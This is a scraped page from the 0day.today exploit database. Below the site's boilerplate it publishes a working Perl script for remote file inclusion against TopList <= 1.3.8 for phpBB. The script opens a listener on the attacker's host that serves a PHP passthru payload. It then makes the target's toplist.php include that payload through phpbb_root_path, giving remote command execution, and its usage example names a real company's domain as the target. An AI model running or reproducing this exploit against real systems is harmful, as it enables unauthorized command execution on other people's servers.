0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit
====================================================== TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit ====================================================== # TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion # Bug found by : [Oo] # # No more uploading php shells !!! # This is my way of php include exploitation !!! # Learn to play with sockets !!! # FOX_MULDER (fox_mulder@abv.bg) #!/usr/bin/perl use LWP 5.64; use IO::Socket; use LWP::Simple; (my $hostname, my $target, my $dir,my $command) = @ARGV; if(@ARGV < 4) { print "=======================================================================+\n"; print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg |\n"; print "Usage: top.pl yourIP target /dir/ \"command\" |\n"; print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\" |\n"; print "=======================================================================+\n"; exit; } print "[+]Creating listening socket . . .\n"; my $sock = new IO::Socket::INET ( LocalHost => "$hostname", LocalPort => '9999', Proto => 'tcp', Listen => 1, Reuse => 1, ); die "Could not create socket: $!\n" unless $sock; if (my $pid = fork){ my $new_sock = $sock->accept(); my $request = <$new_sock>; print $new_sock "HTTP/1.1 200 OK\n"; print $new_sock "Content-Length: $content_length\n"; print $new_sock "Content-Type: text/plain\n\n"; print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n"; close $new_sock; exit; } print "[+]Injecting command . . .\n"; my $browser = LWP::UserAgent->new; $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); my $url = "http://$target/$dir/toplist.php"; my $response = $browser->post( $url, [ 'f' => "toplist_top10", 'phpbb_root_path' => "http://$hostname:9999/blah.php" ] ); die "Received invalid response type", $response->content_type unless $response->content_type eq 'text/html'; print $response->content; # 0day.today [2024-11-15] #